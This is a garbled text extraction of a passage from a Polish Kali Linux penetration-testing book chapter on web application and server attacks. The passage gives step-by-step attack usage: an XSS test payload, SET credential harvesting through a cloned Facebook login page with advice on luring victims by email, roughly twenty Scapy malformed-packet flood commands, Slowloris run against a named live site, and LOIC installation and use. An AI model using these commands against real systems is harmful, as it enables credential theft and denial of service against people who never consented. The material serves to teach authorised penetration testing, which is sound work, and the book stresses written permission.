Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

